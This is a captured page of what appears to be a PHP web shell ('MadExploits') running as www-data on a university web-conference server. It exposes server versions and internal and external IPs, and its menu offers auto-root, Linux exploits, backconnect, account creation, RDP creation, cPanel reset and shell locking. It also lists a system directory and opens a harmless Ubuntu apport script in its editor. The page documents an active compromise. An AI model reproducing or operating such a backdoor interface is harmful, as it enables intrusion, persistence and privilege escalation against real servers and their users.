Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.145.88.104
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
apport /
[ HOME SHELL ]
Name
Size
Permission
Action
general-hooks
[ DIR ]
drwxr-xr-x
package-hooks
[ DIR ]
drwxr-xr-x
symptoms
[ DIR ]
drwxr-xr-x
testsuite
[ DIR ]
drwxr-xr-x
apport
32.03
KB
-rwxr-xr-x
apport-checkreports
1.24
KB
-rwxr-xr-x
apport.jar
2.38
KB
-rw-r--r--
apportcheckresume
3.14
KB
-rwxr-xr-x
dump_acpi_tables.py
1.59
KB
-rwxr-xr-x
gcc_ice_hook
1.18
KB
-rwxr-xr-x
is-enabled
672
B
-rwxr-xr-x
iwlwifi_error_dump
1.92
KB
-rwxr-xr-x
java_uncaught_exception
2.58
KB
-rwxr-xr-x
kernel_crashdump
2.82
KB
-rwxr-xr-x
kernel_oops
1.2
KB
-rwxr-xr-x
package_hook
2.17
KB
-rwxr-xr-x
recoverable_problem
2.25
KB
-rwxr-xr-x
root_info_wrapper
96
B
-rwxr-xr-x
unkillable_shutdown
3.41
KB
-rwxr-xr-x
whoopsie-upload-all
6.03
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : apport-checkreports
#!/usr/bin/python3 # Check if there are new reports for the invoking user. Exit with 0 if new # reports are available, or with 1 if not. # # Copyright (c) 2006 Canonical Ltd. # Author: Martin Pitt <martin.pitt@ubuntu.com> # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation; either version 2 of the License, or (at your # option) any later version. See http://www.gnu.org/copyleft/gpl.html for # the full text of the license. import sys, optparse from apport.fileutils import get_new_reports, get_new_system_reports import apport # parse command line options optparser = optparse.OptionParser('%prog [options]') optparser.add_option('-s', '--system', default=False, action='store_true', help='Check for crash reports from system users.') options, args = optparser.parse_args() if options.system: reports = get_new_system_reports() else: reports = get_new_reports() if len(reports) > 0: for r in reports: print(r.split('.')[0].split('_')[-1]) if apport.packaging.enabled(): sys.exit(0) else: print('new reports but apport disabled') sys.exit(2) else: sys.exit(1)
Close